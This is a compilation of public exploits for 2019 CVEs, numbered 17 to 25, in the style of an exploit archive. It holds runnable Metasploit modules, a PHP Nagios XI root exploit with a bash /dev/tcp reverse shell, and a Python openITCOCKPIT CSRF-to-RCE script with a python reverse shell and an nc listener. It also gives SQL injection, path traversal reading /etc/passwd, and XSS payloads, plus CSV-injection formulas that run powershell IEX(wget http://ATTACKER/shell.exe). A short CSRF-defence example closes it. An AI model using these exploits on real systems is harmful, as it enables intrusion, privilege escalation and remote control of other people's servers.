# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430

The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.

Example Request:

POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]

user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx

Methods for DB-Extraction are:
- Boolean-based blind
- Error-based
- AND/OR time-based blind

The vulnerability was fixed with this commit:
https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a
17. # Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1
# Google Dork: inurl:"/wp-content/plugins/wp-add-mime-types"
# Date: 18 july, 2019
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/
# Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip
# Version: 2.2.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : Fresh

#About Plugin
The plugin adds additional mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.

#Vulnerable Description
WordPress plugin WP Add Mime Types 2.2.1 is vulnerable to CWE-352.

## CSRF Code
Share this malicious link with the plugin user. Once he clicks the link, the mime type will automatically get updated.
Here I shared a POC to allow exe files (application/x-msdownload) to be uploaded.

<html>
  <body onload="document.forms[0].submit()">
    <form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
      <input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
      <input type="submit">
    </form>
  </body>
</html>
18. # Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 8/20/2019
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: Linux
# CVE : CVE-2019-11510

require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Post::File

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Pulse Secure - System file leak',
      'Description'    => %q{
        Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
        This exploit reads /etc/passwd as a proof of concept.
        This vulnerability affects 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.
      },
      'References'     =>
        [
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
        ],
      'Author'         => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL'   => true
        },
    ))
  end

  def run()
    print_good("Checking target...")
    res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)

    if res && res.code == 200
      print_good("Target is Vulnerable!")
      data = res.body
      current_host = datastore['RHOST']
      filename = "msf_sslwebsession_"+current_host+".bin"
      File.delete(filename) if File.exist?(filename)
      file_local_write(filename, data)
      print_good("Parsing file.......")
      parse()
    else
      if(res && res.code == 404)
        print_error("Target not Vulnerable")
      else
        print_error("Ooof, try again...")
      end
    end
  end

  def parse()
    current_host = datastore['RHOST']
    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
    words = 0
    while (line = fileObj.gets)
      printable_data = line.gsub(/[^[:print:]]/, '.')
      array_data = printable_data.scan(/.{1,60}/m)
      for ar in array_data
        if ar != "............................................................"
          print_good(ar)
        end
      end
      #print_good(printable_data)
    end
    fileObj.close
  end
end
19. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'LibreOffice Macro Python Code Execution',
      'Description'    => %q{
        LibreOffice comes bundled with sample macros written in Python and
        allows the ability to bind program events to them. LibreLogo is a
        macro that allows a program event to execute text as Python code,
        allowing RCE. This module generates an ODT file with a dom loaded
        event that, when triggered, will execute arbitrary python code and
        the metasploit payload.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nils Emmerich',   # Vulnerability discovery and PoC
          'Shelby Pace',     # Base module author (CVE-2018-16858), module reviewer and platform-independent code
          'LoadLow',         # This msf module
          'Gabriel Masei'    # Global events vuln. disclosure
        ],
      'References'     =>
        [
          [ 'CVE', '2019-9851' ],
          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],
          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],
          [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
        ],
      'DisclosureDate' => '2019-07-16',
      'Platform'       => 'python',
      'Arch'           => ARCH_PYTHON,
      'DefaultOptions' =>
        {
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),
        OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),
      ])
  end

  def gen_file
    text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])
    py_code = Rex::Text.encode_base64(payload.encoded)
    @cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))"
    @cmd = Rex::Text.html_encode(@cmd)
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
    libre_file = ERB.new(fodt_file).result(binding())
    print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")
    libre_file
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'Cannot find template file')
  end

  def exploit
    fodt_file = gen_file
    file_create(fodt_file)
  end
end
20. <?php
/*
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to escalate privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage plugins.

The getprofile.sh script, invoked by downloading a system profile (profile.php?cmd=download), is executed as root via a passwordless sudo entry; the script executes the 'check_plugin' executable which is owned by the nagios user.
A user logged into Nagios XI with permissions to modify plugins, or the 'nagios' user on the server, can modify the 'check_plugin' executable and insert malicious commands executable as root.

Author: Jak Gibb (https://github.com/jakgibb/nagiosxi-root-exploit)
Date discovered: 28th July 2019
Reported to Nagios: 29th July 2019
Confirmed by Nagios: 29th July 2019
*/

$userVal = parseArgs($argv);
checkCookie();
$userVal['loginNSP'] = extractNSP($userVal['loginUrl']);
authenticate($userVal);
$userVal['pluginNSP'] = extractNSP($userVal['pluginUrl']);
uploadPayload($userVal);
triggerPayload($userVal);

function extractNSP($url)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
    curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);

    echo "[+] Grabbing NSP from: {$url}\n";
    $response = curl_exec($curl);
    $httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);

    if ($httpCode == '200') {
        echo "[+] Retrieved page contents from: {$url}\n";
    } else {
        echo "[+] Unable to open page: {$url} to obtain NSP\n";
        exit(1);
    }

    $DOM = new DOMDocument();
    @$DOM->loadHTML($response);
    $xpath = new DOMXpath($DOM);
    $input = $xpath->query('//input[@name="nsp"]');
    $nsp = $input->item(0)->getAttribute('value');

    if (isset($nsp)) {
        echo "[+] Extracted NSP - value: {$nsp}\n";
    } else {
        echo "[+] Unable to obtain NSP from {$url}\n";
        exit(1);
    }

    return $nsp;
}

function authenticate($userVal)
{
    $postValues = array(
        'username' => $userVal['user'],
        'password' => $userVal['pass'],
        'pageopt'  => 'login',
        'nsp'      => $userVal['loginNSP']
    );

    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $userVal['loginUrl']);
    curl_setopt($curl, CURLOPT_POST, TRUE);
    curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($postValues));
    curl_setopt($curl, CURLOPT_REFERER, $userVal['loginUrl']);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
    curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);

    echo "[+] Attempting to login...\n";
    curl_exec($curl);

    if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '302') {
        echo "[+] Authentication success\n";
    } else {
        echo "[+] Unable to login, check your credentials\n";
        exit(1);
    }

    echo "[+] Checking we have admin rights...\n";
    curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']);
    $response = curl_exec($curl);

    $title = NULL;
    $dom = new DOMDocument();
    if (@$dom->loadHTML($response)) {
        $dom->getElementsByTagName("title")->length > 0 ? $title = $dom->getElementsByTagName("title")->item(0)->textContent : FALSE;
    }

    if (strpos($title, 'Manage') !== FALSE) {
        echo "[+] Admin access confirmed\n";
    } else {
        echo "[+] Unable to reach login page, are you admin?\n";
        exit(1);
    }
}

function uploadPayload($userVal)
{
    $payload = "-----------------------------18467633426500\nContent-Disposition: form-data; name=\"upload\"\n\n1\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"nsp\"\n\n{$userVal['pluginNSP']}\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\nContent-Type: text/plain\n\nbash -i >& /dev/tcp/{$userVal['reverseip']}/{$userVal['reverseport']} 0>&1\n-----------------------------18467633426500--\n";

    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');

    $headers = array();
    $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
    $headers[] = 'Accept-Language: en-GB,en;q=0.5';
    $headers[] = 'Referer: ' . $userVal['pluginUrl'];
    $headers[] = 'Content-Type: multipart/form-data; boundary=---------------------------18467633426500';
    $headers[] = 'Connection: keep-alive';
    $headers[] = 'Upgrade-Insecure-Requests: 1';
    curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);

    echo "[+] Uploading payload...\n";
    $response = curl_exec($curl);

    $dom = new DOMDocument();
    @$dom->loadHTML($response);

    $upload = FALSE;
    foreach ($dom->getElementsByTagName('div') as $div) {
        if ($div->getAttribute('class') === 'message') {
            if (strpos($div->nodeValue, 'New plugin was installed') !== FALSE) {
                $upload = TRUE;
            }
        }
    }

    if ($upload) {
        echo "[+] Payload uploaded\n";
    } else {
        echo '[+] Unable to upload payload';
        exit(1);
    }
}

function triggerPayload($userVal)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $userVal['profileGenUrl']);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
    curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');

    $headers = array();
    $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
    $headers[] = 'Connection: keep-alive';
    $headers[] = 'Upgrade-Insecure-Requests: 1';
    curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);

    echo "[+] Triggering payload: if successful, a reverse shell will spawn at {$userVal['reverseip']}:{$userVal['reverseport']}\n";
    curl_exec($curl);
}

function showHelp()
{
    echo "Usage: php exploit.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port\n";
    exit(0);
}

function parseArgs($argv)
{
    $userVal = array();

    for ($i = 1; $i < count($argv); $i++) {
        if (preg_match('/^--([^=]+)=(.*)/', $argv[$i], $match)) {
            $userVal[$match[1]] = $match[2];
        }
    }

    if (!isset($userVal['host']) || !isset($userVal['ssl']) || !isset($userVal['user']) || !isset($userVal['pass']) || !isset($userVal['reverseip']) || !isset($userVal['reverseport'])) {
        showHelp();
    }

    $userVal['ssl'] == 'true' ? $userVal['proto'] = 'https://' : $userVal['proto'] = 'http://';
    $userVal['loginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/login.php';
    $userVal['pluginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/admin/monitoringplugins.php';
    $userVal['profileGenUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/includes/components/profile/profile.php?cmd=download';

    return $userVal;
}

function checkCookie()
{
    if (file_exists('cookie.txt')) {
        echo "cookie.txt already exists - delete prior to running";
        exit(1);
    }
}
21. # Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
# Exploit Author: MAYASEVEN
# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
# Published on 08/04/2019
# Vendor Homepage at "https://wmspanel.com/nimble"
# Affected Version 3.0.2-2 to 3.5.4-9
# Tested on 3.5.4-9
# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal

# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
# Successful exploitation could allow an attacker to traverse the file system to access
# files or directories that are outside of the restricted directory on the remote server.

POC :
- http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
22. # Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)
# Google Dork: intitle:LISTSERV 16.5
# Date: 08-21-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: http://www.lsoft.com/
# Software Link: http://www.lsoft.com/products/listserv.asp
# Version: Older than Ver 16.5-2018a
# Tested on: IIS 8.5/10.0 - Firefox/Windows
# CVE : CVE-2019-15501

# Software description:
The term Listserv has been used to refer to electronic mailing list software applications in general, but is more properly applied to a few early instances of such software, which allows a sender to send one email to the list, and then transparently sends it on to the addresses of the subscribers to the list.

# POC
1. http://127.0.0.1/scripts/wa.exe?OK=<PAYLOAD>
2. http://127.0.0.1/scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'MTK')>

# References:
1. http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
23. # Exploit Title: UserPro <= 4.9.32 Reflected XSS
# Google Dork: intitle:"Index of" intitle:"UserPro" -uploads
# Date: 25 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
# Version: <= 4.9.32
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-14470

The WordPress plug-in 'UserPro' uses an Instagram library (Instagram PHP API V2 by cosenary) that is vulnerable to Reflected Cross-Site Scripting (XSS).

There is more vulnerable code in 'UserPro' core, might release that later.

As of today (25 August 2019) this issue is unfixed.

Vulnerable code: (success.php on line 36)

    if (isset($_GET['error'])) {
        echo 'An error occurred: ' . $_GET['error_description'];
    }

> https://github.com/cosenary/Instagram-PHP-API/blob/master/example/success.php#L36

Proof-of-Concept:

https://domain.tld/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=<PAYLOAD>
24. # Exploit Title: Wordpress Plugin Import Export WordPress Users <= 1.3.1 - CSV Injection
# Exploit Author: Javier Olmedo
# Contact: @jjavierolmedo
# Website: https://sidertia.com
# Date: 2018-08-22
# Google Dork: inurl:"/wp-content/plugins/users-customers-import-export-for-wp-woocommerce"
# Vendor: WebToffee
# Software Link: https://downloads.wordpress.org/plugin/users-customers-import-export-for-wp-woocommerce.1.3.1.zip
# Affected Version: 1.3.1 and before
# Active installations: +20,000
# Patched Version: update to 1.3.2 version
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64
# CVE: 2019-15092
# References:
# https://hackpuntes.com/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/
# https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787

# 1. Technical Description
# Wordpress Plugin Import Export WordPress Users version 1.3.1 and before is affected by Remote Code
# Execution through a CSV injection vulnerability. This allows any application user to inject commands
# as part of the fields of his profile, and these commands are executed when a user with greater privilege
# exports the data in CSV and opens that file on his machine.

# 2. Vulnerable code
# The function do_export() from the WF_CustomerImpExpCsv_Exporter class does not check if fields begin
# with (=, +, -, @) characters, so the fields name, surname, alias or display_name are vulnerable to CSV Injection.

# 3. Proof Of Concept (PoC)
# 3.1 Login with a subscriber user and change the fields First name, Surname and Alias with payloads.
# 3.2 Login with a high privileges user and export all users to CSV.
# 3.3 When the user with high privileges logs in to the application, exports data in CSV and opens the
# generated file, the command is executed and a shell will open on the machine.

# 4. Payloads
=cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
+cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
-cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
@cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0

# 5. Timeline
# 15, august 2019 - [RESEARCHER] Discover
# 15, august 2019 - [RESEARCHER] Report to Webtoffee support
# 16, august 2019 - [DEVELOPER] More information request
# 16, august 2019 - [RESEARCHER] Detailed vulnerability report
# 19, august 2019 - [DEVELOPER] Unrecognized vulnerability
# 22, august 2019 - [RESEARCHER] Public disclosure
25. # Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE
# Google Dork: N/A
# Date: 26-08-2019
# Exploit Author: Julian Rittweger
# Vendor Homepage: https://openitcockpit.io/
# Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2
# Fixed in: 3.7.1 | https://github.com/it-novum/openITCOCKPIT/releases
# Version: 3.6.1-2
# Tested on: Debian 9
# CVE : 2019-10227
# Exploit Requirements: pip3 install bs4 requests && apt install netcat

#!/usr/bin/env python
import requests, urllib3, os
import http.server, socketserver
from bs4 import BeautifulSoup as bs

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

print("""
-- openITCOCKPIT v.3.6.1-2 [CSRF 2 RCE] --
""")

# Setup values
RHOST = input('[x] Enter IP of remote machine: ')
LHOST = input('[x] Enter IP of local machine: ')
RPORT = int(input('[x] Enter local port (back-connection): '))
LPORT = int(input('[x] Enter local port (payload-hosting): '))

print('[-] Generating CSRF form using the following credentials: "[email protected] - letmein1337" ..')

# Generate file which serves CSRF payload
pl = open('./index.html', 'w')

# Register HTTP server
handler = http.server.SimpleHTTPRequestHandler

csrf = """
<iframe style="display:none;" name="csrff"></iframe>
<form method="post" action="https://""" + RHOST + """/users/add" target="csrff" style="display:none;">
  <input type="text" name="_method" value="POST">
  <input type="text" name="data[User][Container][]" value="1">
  <input type="text" name="data[ContainerUserMembership][1]" value="2">
  <input type="text" name="data[User][usergroup_id]" value="1">
  <input type="text" name="data[User][status]" value="1">
  <input type="text" name="data[User][email]" value="[email protected]">
  <input type="text" name="data[User][firstname]" value="Mr">
  <input type="text" name="data[User][lastname]" value="Nice">
  <input type="text" name="data[User][new_password]" value="letmein1337">
  <input type="text" name="data[User][confirm_new_password]" value="letmein1337">
  <input type="submit">
</form>
<script>
  function Redirect() {
    window.location="https://""" + RHOST + """/login/logout";
  }
  document.forms[0].submit();
  setTimeout('Redirect()', 3000);
</script>
"""

pl.write(csrf)
pl.close()

httpd = socketserver.TCPServer(("", LPORT), handler)

# Start HTTP server, quit on keyboard interrupt
try:
    print('[!] Serving payload at port : ' + str(LPORT) + ', press STRG+C if you registered requests!')
    print('[!] Send this URL to a logged-in administrator: http://' + LHOST + ':' + str(LPORT))
    httpd.serve_forever()
except KeyboardInterrupt:
    httpd.socket.close()

print('\n[-] Starting exploitation ..')
print('[-] Logging in ..')

# Proceed login with generated credentials
c = requests.post('https://' + RHOST + '/login/login', data={'_method' : 'POST', 'data[LoginUser][username]' : '[email protected]', 'data[LoginUser][password]' : 'letmein1337'}, verify=False, allow_redirects=False).headers['Set-Cookie']
print('[!] Received cookie: ' + c.split(';')[0])

print('[-] Creating reverse-shell as macro ..')

# Insert a new macro identified as $USER99$
makro = {'_method' : 'POST', 'data[0][Macro][id]' : 1, 'data[0][Macro][name]' : '$USER1$', 'data[0][Macro][value]' : '/opt/openitc/nagios/libexec', 'data[0][Macro][description]' : 'default', 'data[0][Macro][password]' : 0, 'data[1][Macro][id]' : 2, 'data[1][Macro][name]' : '$USER99$', 'data[1][Macro][value]' : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(RPORT) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", 'data[1][Macro][password]' : 1}
requests.post('https://' + RHOST + '/macros', data=makro, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})

print('[-] Inserting macro as command ..')

# Register a new command using the inserted macro
requests.post('https://' + RHOST + '/commands/add/_controller:commands/_action:hostchecks', data={'_method' : 'POST', 'data[Command][command_type]' : 2, 'data[Command][name]' : 'pwned', 'data[Command][command_line]' : '$USER99$'}, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})

h = bs(requests.get('https://' + RHOST + '/commands/hostchecks', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}).text, 'html.parser')
ids = []

# Fetch current commands by ID
for i in h.find_all('form', {'action': lambda x : x.startswith('/commands/delete')}):
    ids.append(i.get('action').split('/')[-1])

print('[!] ID of command identified as: ' + str(ids[-1]))
print('[-] Updating default host ..')

# Update host, using the new malicious "hostcheck" command
sett = {'_method':'POST','data[Host][id]':'1','data[Host][container_id]':'1','data[Host][shared_container]':'','data[Host][hosttemplate_id]':'1','data[Host][name]':'localhost','data[Host][description]':'default+host','data[Host][address]':'127.0.0.1','data[Host][Hostgroup]':'','data[Host][Parenthost]':'','data[Host][notes]':'','data[Host][host_url]':'','data[Host][priority]':'1','data[Host][tags]':'','data[Host][notify_period_id]':'1','data[Host][notification_interval]':'0','data[Host][notification_interval]':'0','data[Host][notify_on_recovery]':'0','data[Host][notify_on_recovery]':'1','data[Host][notify_on_down]':'0','data[Host][notify_on_unreachable]':'0','data[Host][notify_on_unreachable]':'1','data[Host][notify_on_flapping]':'0','data[Host][notify_on_downtime]':'0','data[Host][active_checks_enabled]':'0','data[Host][active_checks_enabled]':'1','data[Host][Contact]':'','data[Host][Contact][]':'1','data[Host][Contactgroup]':'','data[Host][command_id]':ids[-1],'data[Host][check_period_id]':'1','data[Host][max_check_attempts]':'3','data[Host][check_interval]':'120','data[Host][check_interval]':'120','data[Host][retry_interval]':'120','data[Host][retry_interval]':'120','data[Host][flap_detection_enabled]':'0','data[Host][flap_detection_on_up
]':'0','data[Host][flap_detection_on_down]':'0', 'data[Host][flap_detection_on_unreachable]' : 0} requests.post('https://' + RHOST + '/hosts/edit/1/_controller:hosts/_action:browser/_id:1/', data=sett, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}) # Refresh host configuration print('[-] Refreshing host configuration ..') requests.get('https://' + RHOST + '/exports/launchExport/0.json', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}, headers={'X-Requested-With' : 'XMLHttpRequest'}) print('[!] Done! Enjoy your shell (popup in approx. 30s): ') # We did it! os.system('nc -lvp ' + str(RPORT))
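The whole chain depends on its first step: an administrator's browser posts the attacker-hosted form to /users/add with the victim's session cookie attached, and the server accepts it. The block below is an added example and not openITCOCKPIT code; it is a framework-independent check in Python showing the two server-side controls that stop that step, an Origin/Referer allow-list and a per-session synchroniser token compared in constant time. The request objects, the `openitc.example.internal` host, the attacker address and the in-memory session store are constructed for illustration; only the `itnovum` cookie name comes from the exploit above.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SESSION_COOKIE = "itnovum"                        # cookie name seen in the exploit
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}

# Constructed in-memory session store: session id -> per-session CSRF token
SESSIONS = {}


def new_session():
    """Create a session with a fresh random CSRF token and return its id."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"csrf": secrets.token_urlsafe(32)}
    return sid


def _origin_host(headers):
    """host[:port] the request came from, taken from Origin or else Referer."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return None
    parts = urlsplit(src)
    return parts.netloc.lower() if parts.scheme in ("http", "https") else None


def check_csrf(method, headers, cookies, form, allowed_hosts):
    """Return (ok, reason); reject cross-site state-changing requests.

    Safe methods pass. A state-changing request must carry a known session,
    must originate from one of `allowed_hosts`, and must present that
    session's token in the `_csrf` form field.
    """
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    sess = SESSIONS.get(cookies.get(SESSION_COOKIE, ""))
    if sess is None:
        return False, "no valid session"
    origin = _origin_host(headers)
    if origin is None:
        return False, "missing Origin/Referer"
    if origin not in {h.lower() for h in allowed_hosts}:
        return False, "origin %s not allowed" % origin
    token = form.get("_csrf", "")
    # compare_digest avoids leaking the token through timing differences
    if not hmac.compare_digest(token, sess["csrf"]):
        return False, "bad or missing CSRF token"
    return True, "ok"


# Constructed requests reproducing the two cases that matter for the chain
ALLOWED = {"openitc.example.internal"}


def attacker_form_post(sid):
    """What the victim's browser sends after loading http://LHOST:LPORT/ ."""
    return check_csrf(
        "POST",
        {"Origin": "http://10.0.0.5:8000"},          # attacker's payload host
        {SESSION_COOKIE: sid},                        # victim's cookie rides along
        {"_method": "POST", "data[User][usergroup_id]": "1"},
        ALLOWED,
    )


def legitimate_form_post(sid):
    """The same form submitted from the app's own page, carrying its token."""
    return check_csrf(
        "POST",
        {"Origin": "https://openitc.example.internal"},
        {SESSION_COOKIE: sid},
        {"_method": "POST", "_csrf": SESSIONS[sid]["csrf"]},
        ALLOWED,
    )


if __name__ == "__main__":
    sid = new_session()
    print(attacker_form_post(sid))
    print(legitimate_form_post(sid))
```

Either control on its own breaks the exploit's first step: the attacker's page cannot read the token out of the victim's session, and it cannot make the browser send an Origin of the application's host. Marking the session cookie `SameSite=Lax` is a third, independent layer, since the browser then omits the `itnovum` cookie from the cross-site POST into the hidden iframe altogether.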